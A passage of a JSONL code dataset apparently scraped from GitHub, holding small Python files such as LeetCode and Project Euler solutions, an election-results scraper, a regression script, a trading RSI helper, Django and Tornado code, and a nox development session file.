print(f'a = {a.ljust(10)} b = {b}')\n print(f'a.index(s[i])+1 = {a.index(s[i])+1}')\n print(f'a[a.index(s[i])+1::] = {a[a.index(s[i])+1::]}')\n print(f'a[a.index(s[i])+1::] + s[i] = {a[a.index(s[i])+1::] + s[i]}')\n a = a[a.index(s[i])+1::] + s[i]\n\n print(f'a = {a.ljust(10)} b = {b}')\n print('')\n return max(len(b), len(a))\n\n\n\nif __name__ == '__main__':\n soln = Solution()\n soln.lengthOfLongestSubstring(\"\")\n soln.lengthOfLongestSubstring(\"a\")\n soln.lengthOfLongestSubstring(\"abcdabracadabra\")\n soln.lengthOfLongestSubstring(\"abcabcbb\")\n soln.lengthOfLongestSubstring(\"bbbbb\")\n soln.lengthOfLongestSubstring(\"pwwkew\")\n soln.lengthOfLongestSubstring(\"abcdamn\")\n soln.lengthOfLongestSubstring(\"abcdambq\")\n soln.lengthOfLongestSubstring(\"abcbamboy\")\n","repo_name":"oneforawe/code-practice","sub_path":"Python/LeetCode/003_LongestSubstring/dev/LongestSubstring_6.py","file_name":"LongestSubstring_6.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"329314336","text":"\n\nimport click\n\nfrom pathlib import Path\nfrom operator import add\n\n@click.command('67')\ndef problem_067():\n \"\"\"Maximum path sum II\n\n By starting at the top of the triangle below and moving to adjacent\n numbers on the row below, the maximum total from top to bottom is 23.\n \n **3** \n **7** 4 \n 2 **4** 6 \n 8 5 **9** 3\n \n That is, 3 + 7 + 4 + 9 = 23.\n \n Find the maximum total from top to bottom in\n [triangle.txt](project/resources/p067_triangle.txt) (right click and 'Save\n Link/Target As...'), a 15K text file containing a triangle with one-\n hundred rows.\n \n **NOTE:** This is a much more difficult version of [Problem 18](problem=18). It is not possible to try every route to solve this problem, as there are 299 altogether! If you could check one trillion (1012) routes every second it would take over twenty billion years to check them all. There is an efficient algorithm to solve it. ;o)\n \n \"\"\"\n\n triangle = load_triangle()\n while len(triangle) > 1:\n triangle = reduce_triangle(triangle, max, add)\n click.echo(triangle[0][0])\n\n\ndef reduce_triangle(triangle, pick, combine):\n ultimate = triangle[-1]\n penultimate = triangle[-2]\n new_row = tuple(\n combine(value, pick(ultimate[i], ultimate[i + 1]))\n for i, value in enumerate(penultimate))\n return triangle[:-2] + (new_row, )\n\n\ndef load_triangle():\n with Path('.', 'files', 'triangle.txt').open('r') as f:\n return tuple(\n tuple(int(i) for i in line.split(' '))\n for line in f.readlines()\n )","repo_name":"adharris/euler","sub_path":"problems/problems_000_099/problems_060_069/problem_067.py","file_name":"problem_067.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"31783360541","text":"import pandas as pd\nimport requests\nfrom lxml import etree\n\n_old_uri = 'https://www.volby.cz/pls/kv2002/kv12?xjazyk=CZ&xid=0'\n_old_candidates = 'https://www.volby.cz/pls/kv2002/kv22?xjazyk=CZ&xid=0&xv=11'\n_old_base = 'https://www.volby.cz/pls/kv2002/'\n_ns = {\"re\": \"http://exslt.org/regular-expressions\"}\n_parser = etree.HTMLParser()\n\n\ndef format_candidates(df):\n df.columns = df.columns.droplevel(0)\n if 'Mandát' in df.columns:\n df['mandate'] = [True if x == '*' else False for x in df['Mandát']]\n df = df.drop(columns='Mandát')\n else:\n df = df.insert(loc=len(df.columns) - 1, column='mandate', value=0)\n return df\n\n\ndef download_city(city: str):\n html = requests.get(_old_uri).text\n href = etree.fromstring(html, parser=_parser).xpath('.//td[re:match(., \"^{0}\")]'.format(city), namespaces=_ns)[0] \\\n .getparent().getchildren()[0].find('a').attrib['href']\n html = requests.get(_old_base + href).text\n href = etree.fromstring(html, parser=_parser).xpath('.//a[re:match(., \"^3$\")]', namespaces=_ns)[0].attrib['href']\n dfs = pd.read_html(_old_base + href, flavor='html5lib')\n\n for x in [5, 6, 8, 9]:\n dfs[0][dfs[0].columns[x]] = dfs[0][dfs[0].columns[x]].str.replace(\"\\s\", '')\n\n dfs[0].insert(0, 'year', 2002)\n dfs[0].to_csv('data/summary.csv', index=False, header=False, sep=';', mode='a')\n\n dfs[1][dfs[1].columns[1]] = dfs[1][dfs[1].columns[1]].str.replace(\"\\s\", '')\n dfs[1].insert(0, 'id', range(1, len(dfs[1]) + 1))\n dfs[1].insert(0, 'year', 2002)\n dfs[1].to_csv('data/party_votes.csv', index=False, header=False, sep=';', mode='a')\n\n\ndef download_city_candidates(city: str):\n html = requests.get(_old_candidates).text\n href = etree.fromstring(html, parser=_parser) \\\n .xpath('.//td[re:match(., \"^{0}\") and not (@colspan)]'.format(city), namespaces=_ns)[0] \\\n .getnext().find('a').attrib['href']\n\n html = requests.get(_old_base + href).text\n href = etree.fromstring(html, parser=_parser) \\\n .xpath('.//td[re:match(., \"^3$\")]', namespaces=_ns)[0].getparent().getchildren()[0].find('a').attrib['href']\n\n html = requests.get(_old_base + href).text\n href = etree.fromstring(html, parser=_parser).xpath('.//td/a')[0].attrib['href']\n df = pd.read_html(_old_base + href, flavor='html5lib')[0]\n df = format_candidates(df)\n df['abs.'] = df['abs.'].str.replace(\"\\s\", '')\n df.insert(0, 'year', 2002)\n df.to_csv('data/candidates.csv', index=False, header=False, sep=';', mode='a')\n\n\ndef scrape(city: str):\n print('Scraping 2002', end=' ')\n download_city(city)\n download_city_candidates(city)\n print('✓')\n\n\nif __name__ == \"__main__\":\n city = 'Plzeň'\n download_city(city)\n download_city_candidates(city)\n","repo_name":"Eldeeqq/BI-VZD","sub_path":"01/scrapers/old.py","file_name":"old.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39638935261","text":"import os\n\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\n\nfrom root import ROOT_DIR\nfrom weighted_mean_prediction.data_setup import get_encoded_split_data\nfrom weighted_mean_prediction.linear_model.shared import normalise_data, fit_model\nfrom weighted_mean_prediction.model_storage import load_model\nfrom weighted_mean_prediction.regression_performance import evaluate_model, get_all_metrics, plot_residuals_histogram, \\\n plot_QQ, plot_fitted, plot_fancy_fitted\n\n\ndef reshape_data(*X):\n return [x.values.reshape(-1, 1) for x in X]\n\n\nif __name__ == \"__main__\":\n reg = LinearRegression()\n\n model_dir = f\"{ROOT_DIR}/weighted_mean_prediction/linear_model/models\"\n model_name = \"pairing_lr.joblib\"\n model_path = os.path.join(model_dir, model_name)\n\n X_train, X_val, X_test, y_train, y_val, y_test = get_encoded_split_data()\n # X_train, X_val, X_test = get_dG_data(X_train, X_val, X_test)\n X_train, X_val, X_test = normalise_data(X_train, X_val, X_test)\n X_train, X_val, X_test = reshape_data(X_train[\"dG_pairing\"], X_val[\"dG_pairing\"], X_test[\"dG_pairing\"])\n\n lm = load_model(model_path)\n lm = lm if lm is not None else fit_model(X_train, y_train[\"weighted_mean\"], model_path)\n print(lm.coef_)\n predictions, errors = evaluate_model(lm, X_test, y_test[\"weighted_mean\"])\n print(get_all_metrics(y_test[\"weighted_mean\"], predictions))\n plt.scatter(X_test, predictions)\n plt.scatter(X_test, y_test)\n plt.show()\n\n plot_residuals_histogram(predictions, y_test[\"weighted_mean\"])\n plot_QQ(predictions, y_test[\"weighted_mean\"])\n plot_fancy_fitted(predictions, y_test[\"weighted_mean\"])\n\n print(f\"y = {lm.intercept_} + {lm.coef_[0]}x\")\n","repo_name":"fegb-dataset22/dataset22","sub_path":"weighted_mean_prediction/linear_model/pairing_lr.py","file_name":"pairing_lr.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"27330345356","text":"import datetime\nimport json\nimport re\nfrom pathlib import Path\n\nimport pandas as pd\nimport requests\nimport tabulate\nfrom bs4 import BeautifulSoup\n\nout = Path('parsed_xml2_downloads')\n\nif __name__ == '__main__':\n directory = Path('hdb_downloads')\n for path in directory.glob('2023-05_BTO_*.xml'):\n soup = BeautifulSoup(path.read_bytes(), 'lxml-xml')\n town = soup.find('town').text.replace('/', '+')\n project_name = soup.find('project-name').text\n print(f'{town} ({project_name})')\n\n stack = [soup]\n while stack:\n elem = stack.pop(-1)\n children = elem.findChildren()\n if children:\n stack.extend(children)\n continue\n\n if re.fullmatch(r'[0-9]{4}-[0-9]{2}/.+\\.[a-z]{2,5}', elem.text):\n r = requests.get(f'https://resources.homes.hdb.gov.sg/nf/{elem.text}', verify=False)\n if r.status_code == 200:\n out_path = out / elem.text\n out_path.parent.mkdir(parents=True, exist_ok=True)\n out_path.write_bytes(r.content)\n","repo_name":"averykhoo/macpherson-bto","sub_path":"hdb-api-samples/parse-xml2.py","file_name":"parse-xml2.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"25646633950","text":"encontrado = 0\r\nnumeros = []\r\nfor c in range(3):\r\n numeros.append(int(input(f'Digite o número {c+1}: ')))\r\nnum = int(input('Número para verificar: '))\r\nfor c in range(len(numeros)):\r\n if num == numeros[c]:\r\n print(f'Encontrado na posição {c}')\r\n else:\r\n print('Não encontrado')\r\n","repo_name":"alexalvferr/fabrica","sub_path":"Exercício 84.py","file_name":"Exercício 84.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"74962586779","text":"import math\nimport random\nimport arcade\n\nimport wyggles.app\nfrom wyggles.mathutils import *\nfrom wyggles.engine import *\nimport wyggles.app\nfrom wyggles.brain import Brain\nfrom wyggles.fruit import Fruit\n\nclass WyggleBrain(Brain):\n def __init__(self, sprite):\n super().__init__(sprite)\n self.heading = random.randint(0, 359)\n self.wheel = 0\n self.focus = None\n self.state = \"wanderer\"\n self.consider_max = 10\n self.consider_timer = self.consider_max\n #\n self.munch_timer = 10\n\n def reset(self):\n self.state = ''\n self.focus = None\n\n def update(self, delta_time: float = 1 / 60):\n super().update(delta_time)\n\n def move(self):\n x, y = self.position\n to_x, to_y = self.end_pos\n\n pd = random.randint(0, 3)\n if pd == 0:\n self.micro_left()\n elif pd == 2:\n self.micro_right()\n\n steering_ndx = int(math.pi + (math.atan2(y - to_y, x - to_x)))\n delta = steering[steering_ndx][self.wheel]\n\n self.try_move(delta)\n\n \n def try_move(self, delta):\n delta_x, delta_y = delta\n next_x, next_y = 0, 0\n need_turn = False\n\n sprite = self.sprite\n pos = sprite.position\n left, bottom, right, top = sprite.left, sprite.bottom, sprite.right, sprite.top\n w_left, w_bottom, w_right, w_top = world_left, world_bottom, world_right, world_top\n\n if(left < w_left):\n delta_x = w_left - left\n need_turn = True\n elif(right > w_right):\n delta_x = w_right - right\n need_turn = True\n\n if(bottom < w_bottom):\n delta_y = w_bottom - bottom\n need_turn = True\n elif(top > w_top):\n delta_y = w_top - top\n need_turn = True\n\n #TODO:use pymunk\n '''\n if not need_turn:\n landscape_layer = wyggles.app.landscape_layer\n if landscape_layer:\n need_turn = len(arcade.check_for_collision_with_list(self.sprite, landscape_layer)) != 0\n '''\n if(need_turn):\n self.right(45)\n #self.randforward()\n self.project(self.sensor_range)\n\n nextX = self.x + delta_x\n nextY = self.y + delta_y\n self.sprite.move_to((nextX, nextY))\n\n def left(self, angle):\n heading = self.heading - angle\n self.heading = heading if heading > 0 else 360 + heading\n\n def right(self, angle):\n heading = self.heading + angle\n self.heading = heading if heading < 359 else heading - 360\n\n def micro_left(self):\n ph = self.wheel - 1\n if ph < 0:\n ph = 0\n self.wheel = ph\n\n def micro_right(self):\n ph = self.wheel + 1\n if ph > 2:\n ph = 2\n self.wheel = ph\n\n def forward(self, distance):\n x, y = self.position\n px = x + (distance * (math.cos(self.heading * degRads)))\n py = y + (distance * (math.sin(self.heading * degRads)))\n self.move_to((px, py))\n\n def randforward(self):\n self.forward(random.randint(0, self.sensor_range))\n\nsteering = [\n [(1, -1), (1, 0), (1, 1)],\n [(1, 0), (1, 1), (0, 1)],\n [(1, 1), (0, 1), (-1, 1)],\n [(0, 1), (-1, 1), (-1, 0)],\n [(-1, 1), (-1, 0), (-1, -1)],\n [(-1, 0), (-1, -1), (0, -1)],\n [(-1, -1), (0, -1), (1, -1)],\n [(0, -1), (1, -1), (1, 0)],\n]\n","repo_name":"kfields/botsley","sub_path":"examples/wyggles/wyggles/wyggle/brain.py","file_name":"brain.py","file_ext":"py","file_size_in_byte":3418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"72263256541","text":"# Given an array of integers nums which is sorted in ascending order, and an integer target, \n# write a function to search target in nums. If target exists, then return its index. \n# Otherwise, return -1.\n\n# Example 1:\n\n# Input: nums = [-1,0,3,5,9,12], target = 9\n# Output: 4\n# Explanation: 9 exists in nums and its index is 4\n\nfrom cmath import pi\nimport re\n\n\nclass Solution():\n def search(self, nums, target):\n left, right = 0 , len(nums) - 1\n while left <= right:\n pivot = left + (right - left) / 2 \n if nums[pivot] == target:\n return pivot\n if target < nums[pivot]:\n right = pivot - 1 \n else:\n left = pivot + 1\n return -1\n\n\ns = Solution()\n\nprint(s.search([-1,0,3,5,9,12],9))","repo_name":"AlfredDev/LeetCode75-Py","sub_path":"704-Binary Search.py","file_name":"704-Binary Search.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"73053481500","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom soma.spm.custom_decorator_pattern import checkIfArgumentTypeIsAllowed\nimport numbers\n\nclass OptimisationSettings(object):\n \"\"\"\n Settings for the optimisation. If you are unsure about them, then leave them at the default values. Optimisation is by repeating a\n number of Levenberg-Marquardt iterations, in which the equations are solved using a full multi-grid (FMG) scheme. FMG and\n Levenberg-Marquardt are both described in Numerical Recipes (2nd edition).\n \"\"\"\n @checkIfArgumentTypeIsAllowed(numbers.Real, 1)\n def setLMRegularisation(self, LM_regularisation):\n \"\"\"\n Levenberg-Marquardt regularisation. Larger values increase the the stability of\n the optimisation, but slow it down. A value of zero results in a Gauss-Newton\n strategy, but this is not recommended as it may result in instabilities in the FMG.\n \"\"\"\n self.LM_regularisation = LM_regularisation\n \n @checkIfArgumentTypeIsAllowed(int, 1)\n def setCycles(self, cycles):\n \"\"\"\n Number of cycles used by the full multi-grid matrix solver. More cycles result in\n higher accuracy, but slow down the algorithm. See Numerical Recipes for more\n information on multi-grid methods.\n \"\"\"\n if cycles in [1, 2, 3, 4, 5, 6, 7, 8]:\n self.cycles = cycles\n else:\n raise ValueError(\"Unvalid cycles\")\n \n @checkIfArgumentTypeIsAllowed(int, 1)\n def setIterations(self, iterations):\n \"\"\"\n Number of relaxation iterations performed in each multi-grid cycle. More\n iterations are needed if using ``bending energy'' regularisation, because the\n relaxation scheme only runs very slowly. See the chapter on solving partial\n differential equations in Numerical Recipes for more information about relaxation\n methods.\n \"\"\"\n if iterations in [1, 2, 3, 4, 5, 6, 7, 8]:\n self.iterations = iterations\n else:\n raise ValueError(\"Unvalid cycles\")\n \n def getStringListForBatch(self):\n if not None in [self.LM_regularisation, self.cycles, self.iterations]:\n batch_list = []\n batch_list.append(\"optim.lmreg = \" + str(self.LM_regularisation) + \";\")\n batch_list.append(\"optim.cyc = \" + str(self.cycles) + ';')\n batch_list.append(\"optim.its = \" + str(self.iterations) + ';')\n return batch_list \n else:\n raise ValueError('At least one OptimisationSettings parameter missed')\n ","repo_name":"brainvisa/brainvisa-spm","sub_path":"python/soma/spm/virtual_spm/tools/dartel_tools/run_dartel/optimisation_settings.py","file_name":"optimisation_settings.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"71875406299","text":"from tornado.web import RequestHandler\nfrom tornado import gen\nfrom json import dumps, loads\nfrom random import randint\nfrom db import DbHandler\n\nclass TaskHandler(RequestHandler):\n def initialize(self):\n self.db = DbHandler.get_db()\n\n @gen.coroutine\n def post(self):\n user = self.get_secure_cookie(\"user\").decode()\n result = int(loads(self.request.body.decode()).get('result', '0'))\n new_task = self.generate_task()\n balance = yield self.db.update_score(user, result, new_task)\n self.write(dumps({\n \"task\" : new_task,\n \"balance\" : balance\n }))\n\n def generate_task(self):\n return randint(2**17, 2**24)\n","repo_name":"HackerDom/qctf-starter-2018","sub_path":"tasks/browser-mining/tornado/handlers/TaskHandler.py","file_name":"TaskHandler.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"69"}
+{"seq_id":"74228805659","text":"import numpy as np\ndef merge_main_context(W, merge_fun=lambda m, c: np.mean([m, c], axis=0),\n normalize=True):\n \"\"\"\n Merge the main-word and context-word vectors for a weight matrix\n using the provided merge function (which accepts a main-word and\n context-word vector and returns a merged version).\n\n By default, `merge_fun` returns the mean of the two vectors.\n \"\"\"\n\n vocab_size = len(W) / 2\n for i, row in enumerate(W[:vocab_size]):\n merged = merge_fun(row, W[i + vocab_size])\n if normalize:\n merged /= np.linalg.norm(merged)\n W[i, :] = merged\n\n return W[:vocab_size]\n\ndef read_lines_in_file(path):\n with open(path) as f:\n return f.read().split(\"\\n\")","repo_name":"danielvarab/contradiction-detection","sub_path":"util/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"14954058802","text":"import logging\nfrom typing import List\n\n\nclass Solution:\n @classmethod\n def moveZeroes(cls, nums: List[int]):\n logging.debug(f\"input: nums = {nums}\")\n result_nums_idx = -1\n\n for i in range(len(nums)):\n if nums[i] != 0:\n result_nums_idx += 1\n nums[result_nums_idx] = nums[i]\n\n while result_nums_idx > -1 and result_nums_idx + 1 < len(nums):\n result_nums_idx += 1\n if nums[result_nums_idx] != 0:\n nums[result_nums_idx] = 0\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n\n nums1 = [0, 1, 0, 3, 12]\n expected_nums1 = [1, 3, 12, 0, 0]\n Solution.moveZeroes(nums1)\n for i in range(len(expected_nums1)):\n assert nums1[i] == expected_nums1[i]\n\n nums2 = [0]\n expected_nums2 = [0]\n Solution.moveZeroes(nums2)\n for i in range(len(expected_nums2)):\n assert nums2[i] == expected_nums2[i]\n\n nums3 = [0, 0, 0]\n expected_nums3 = [0, 0, 0]\n Solution.moveZeroes(nums3)\n for i in range(len(expected_nums3)):\n assert nums3[i] == expected_nums3[i]\n","repo_name":"ladamalina/leetcode-2022-python","sub_path":"283. Move Zeroes (easy)/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"33627982241","text":"import numpy as np\n\n\ndef rotation_matrix(a):\n return np.array([[np.cos(a), -np.sin(a)],\n [np.sin(a), np.cos(a)]])\n\n\ndef margin(angle, size, v1, v2):\n vv = v2 - v1\n vv = vv / np.sqrt((vv**2).sum())\n edgelen = size / np.sin(angle)\n v3 = v1 + edgelen * np.dot(rotation_matrix(angle), vv)\n v4 = v2 - edgelen * np.dot(rotation_matrix(-angle), vv)\n return np.c_[v2, v4, v3, v1].T\n\n\ndef regular_polygon(n, v1, v2):\n ang = 2 * np.pi / n\n mat = rotation_matrix(ang)\n vs = np.c_[v1, v2]\n vv = v2 - v1\n vprev = v2\n for i in range(n - 2):\n v = np.dot(mat, vv) + vprev\n vs = np.c_[vs, v]\n vv = v - vprev\n vprev = v\n return vs.T\n","repo_name":"hamukazu/craft_regpolyhed","sub_path":"craftmath.py","file_name":"craftmath.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"8249327875","text":"# -*- coding: utf-8 -*-\nimport os\nimport shutil\nfrom tempfile import mkdtemp\n\nfrom django.test import TestCase\n\nfrom django_extensions.management.mysql import parse_mysql_cnf\n\n\nclass ParseMysqlCnfTests(TestCase):\n \"\"\"Tests for parse_mysql_cnf.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.tmpdir = mkdtemp()\n\n @classmethod\n def tearDownClass(cls):\n shutil.rmtree(cls.tmpdir)\n\n def test_should_return_empty_strings_if_read_default_file_option_is_missing(self):\n dbinfo = {}\n\n result = parse_mysql_cnf(dbinfo)\n\n self.assertEqual(result, ('', '', '', '', ''))\n\n def test_should_parse_my_cnf_and_retun_connection_settings(self):\n my_cnf_path = os.path.join(self.tmpdir, 'my.cnf')\n with open(my_cnf_path, 'w') as f:\n f.write(\"\"\"[client]\ndatabase = test_name\nuser = test_user\npassword = test_password\nhost = localhost\nport = 3306\nsocket = /var/lib/mysqld/mysql.sock\n\"\"\")\n\n dbinfo = {\n 'ENGINE': 'django.db.backends.mysql',\n 'OPTIONS': {\n 'read_default_file': my_cnf_path,\n }\n }\n\n result = parse_mysql_cnf(dbinfo)\n\n self.assertEqual(result,\n ('test_user', 'test_password', 'test_name',\n '/var/lib/mysqld/mysql.sock', '3306'))\n\n def test_should_return_empty_strings_if_NoSectionError_exception_occured(self):\n my_cnf_path = os.path.join(self.tmpdir, 'my.cnf')\n with open(my_cnf_path, 'w') as f:\n f.write(\"\")\n\n dbinfo = {\n 'ENGINE': 'django.db.backends.mysql',\n 'OPTIONS': {\n 'read_default_file': my_cnf_path,\n }\n }\n result = parse_mysql_cnf(dbinfo)\n\n self.assertEqual(result, ('', '', '', '', ''))\n","repo_name":"django-extensions/django-extensions","sub_path":"tests/test_parse_mysql_cnf.py","file_name":"test_parse_mysql_cnf.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":6269,"dataset":"github-code","pt":"69"}
+{"seq_id":"18768121081","text":"from rest_framework import serializers\nfrom .models import Profile\n\n\nclass ProfileSerializer(serializers.ModelSerializer):\n username = serializers.CharField(source=\"user.username\")\n first_name = serializers.CharField(source=\"user.first_name\")\n last_name = serializers.CharField(source=\"user.last_name\")\n email = serializers.EmailField(source=\"user.email\")\n full_name = serializers.SerializerMethodField(read_only=True)\n \"\"\"Allow for null field\"\"\"\n resolution = serializers.CharField(source='custom_resolution.resolution', required=False)\n\n class Meta:\n model = Profile\n fields = [\n 'username',\n 'first_name',\n 'last_name',\n 'full_name',\n 'email',\n 'id',\n 'tier',\n 'resolution',\n 'custom_resolution'\n ]\n\n \"\"\"Allow for null field\"\"\"\n extra_kwargs = {\"resolution\": {\"required\": False, \"allow_null\": True}}\n\n def get_full_name(self, obj):\n first_name = obj.user.first_name.title()\n last_name = obj.user.last_name.title()\n return f\"{first_name} {last_name}\"\n\n\n\n","repo_name":"Packerson/Upload_Images_Api","sub_path":"Upload_Images/apps/profiles/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"4289120638","text":"import pandas as pd\nimport numpy\nimport talib\nimport datetime\nfrom datetime import timedelta\nfrom itertools import tee, islice, chain\n\ndef Dataframe(serie):\n return pd.DataFrame(serie ,columns=[\"RSI\"])\n\ndef Dataframe(data,index):\n return pd.DataFrame(data=data,index=index,columns=[\"RSI\"])\n\ndef RSI(close,timeperiod):\n return talib.RSI(close,timeperiod)\n\ndef RSIDataframe(close,timeperiod):\n return pd.DataFrame(talib.RSI(close,timeperiod),columns=[\"RSI\"])\n\ndef CustomRSIdf(dfclose,timeperiod):\n custom = dfclose['Close'].replace(dfclose['Close'].tolist(),talib.RSI(dfclose['Close'],timeperiod))\n custom = custom.rename('RSI')\n return custom.to_frame()\n\ndef intindexposition(df,timestamp):\n return df.index.get_loc(timestamp)\n\n# Analizar rangos de 40 valores ver cuales tienen “RSI (base 7) >70%”\ndef RSImorethan(dfrsi,value):\n if dfrsi.columns[0] == 'RSI(C,7)':\n dfrsi = dfrsi.rename(columns={'RSI(C,7)':'RSI'})\n rsimore70 = dfrsi.query(\"{} >= {}\".format(dfrsi.columns[0],value))\n #print(\"Mas de 70\" + str(rsimore70))\n if len(rsimore70.index) > 0:\n return rsimore70\n else:\n return False\n\ndef changersicolumnname(dfrsi):\n if dfrsi.columns[0] == 'RSI(C,7)':\n return dfrsi.rename(columns={'RSI(C,7)':'RSI'})\n\ndef TopRSI70(dfrsi70):\n top70 = []\n index = []\n cnt = 0\n for previous, item, nxt in previous_and_next(dfrsi70.values.tolist()):\n #print(\"Prev:{}, Nxt:{}, item:{},type:{}\".format(str(previous),str(nxt),str(item),str(type(item))))\n if previous is None:\n if item >= nxt:\n top70.append(item)\n index.append(dfrsi70.index[cnt])\n else:\n if nxt is None:\n if item >= previous:\n top70.append(item)\n index.append(dfrsi70.index[cnt])\n else:\n if item >= nxt and item >= previous:\n top70.append(item)\n index.append(dfrsi70.index[cnt])\n cnt = cnt + 1\n return pd.DataFrame(top70,columns=['RSI'],index=index)\n\ndef previous_and_next(some_iterable):\n prevs, items, nexts = tee(some_iterable, 3)\n prevs = chain([None], prevs)\n nexts = chain(islice(nexts, 1, None), [None])\n return zip(prevs, items, nexts)\n\ndef top2rsivalues(dfrsi):\n dfm70 = RSImorethan70(dfrsi)\n return dfm70.nlargest(2,'RSI')\n\ndef top2rsi70values(dfrsi70):\n return dfrsi70.nlargest(2,'RSI')\n \ndef highestvalue(dfrsi):\n return dfrsi.nlargest(1,'RSI') \n\ndef smallestvalue(dfrsi):\n return dfrsi.nsmallest(1,'RSI')\n\ndef definehighestrsi(top2):\n if top2.values[0] > top2.values[1]:\n return top2.index[0] \n else:\n return top2.index[1]\n\ndef diftime(time1,time2):\n difference = time1-time2\n seconds_in_day = 24 * 60 * 60\n difmin = divmod(difference.days * seconds_in_day + difference.seconds, 60)\n return difmin\n\ndef addminutes(date,min):\n return date + timedelta(minutes=min) \n\ndef datetimetostr(datetime):\n return datetime.strftime(\"%Y-%m-%d %H:%M:%S\")\n\ndef changetendency(ant,up):\n if ant < up:\n return True\n else:\n return False\n\ndef istopvalue(threesizearray):\n if max(threesizearray[0]) == val:\n return True\n if min(threesizearray[0] == val):\n return True \n return False\n \n\ndef foundposibleC4(dfrsi,C2,C3):\n if dfrsi.columns[0] == 'RSI(C,7)':\n dfrsi = dfrsi.rename(columns={'RSI(C,7)':'RSI'})\n posibleC4 = dfrsi.query(\"{} >= ({} - 0.5*{})/1.5 and {} <= ({} - 0.786*{})/1.5\").format(dfrsi.columns[0],C2,C3,dfrsi.columns[0],C2,C3)\n #print(\"Mas de 70\" + str(rsimore70))\n if len(posibleC4.index) > 0:\n return posibleC4\n else:\n return False\n\n\n\nif __name__ == '__main__':\n from csvreader import BacktestingDataframe \n AUDUSD = 
BacktestingDataframe(\"AUDUSD\",\"12-06-2020\").get_dataframe()\n output = talib.CDLEVENINGSTAR(AUDUSD[\"Open\"],AUDUSD[\"High\"],AUDUSD[\"Low\"],AUDUSD[\"Close\"],penetration = 0)\n pd.set_option(\"display.max_rows\",None,\"display.max_columns\",None)\n rsi = RSIDataframe(AUDUSD[\"Close\"],7)\n top2 = top2rsivalues(rsi)\n #print(rsi)\n print(top2)\n print(AUDUSD.index[1])\n print(AUDUSD.index[5])\n print(diftime(top2.index[0],top2.index[1])[0])\n if diftime(top2.index[0],top2.index[1])[0] > 10:\n print(\"Es mayor a diez\")\n #print(top2.index)","repo_name":"JaimeOli/trading-para-todos","sub_path":"source/core/startegiesfunctions.py","file_name":"startegiesfunctions.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"36858392546","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Jun 29 21:18:30 2021\r\n\r\n@author: Deepak Murugesan\r\n\"\"\"\r\n\r\nfrom functools import reduce\r\n\r\nfib = lambda n: reduce(lambda x, _: x+[x[-1]+x[-2]],\r\n\t\t\t\t\t\t\t\trange(n-2), [0, 1])\r\n\r\nprint(fib(5))\r\n","repo_name":"DeepakM2001/python_intern","sub_path":"d16/Ex2.py","file_name":"Ex2.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32033608606","text":"\"\"\"Contains the nox sessions for running development environments.\"\"\"\nfrom typing import Literal\n\nfrom nox import Session, param, parametrize\nfrom nox import session as nox_session\nfrom nox.command import CommandFailed\n\nfrom constants_nox import (\n COMPOSE_SERVICE_NAME,\n EXEC,\n EXEC_IT,\n LOGIN,\n RUN_CYPRESS_TESTS,\n START_APP,\n START_APP_REMOTE_DEBUG,\n START_TEST_ENV,\n)\nfrom docker_nox import build\nfrom run_infrastructure import ALL_DATASTORES, run_infrastructure\nfrom utils_nox import COMPOSE_DOWN_VOLUMES\n\n\n@nox_session()\ndef shell(session: Session) -> None:\n \"\"\"\n Open a shell in an already-running Fides webserver container.\n\n If the container is not running, the command will fail.\n \"\"\"\n shell_command = (*EXEC_IT, \"/bin/bash\")\n try:\n session.run(*shell_command, external=True)\n except CommandFailed:\n session.error(\n \"Could not connect to the webserver container. Please confirm it is running and try again.\"\n )\n\n\n@nox_session()\ndef dev(session: Session) -> None:\n \"\"\"\n Spin up the Fides webserver in development mode alongside it's Postgres\n database and Redis cache. Use positional arguments to run other services\n like privacy center, shell, admin UI, etc. (see usage for examples)\n\n Usage:\n 'nox -s dev' - runs the Fides weserver, database, and cache\n 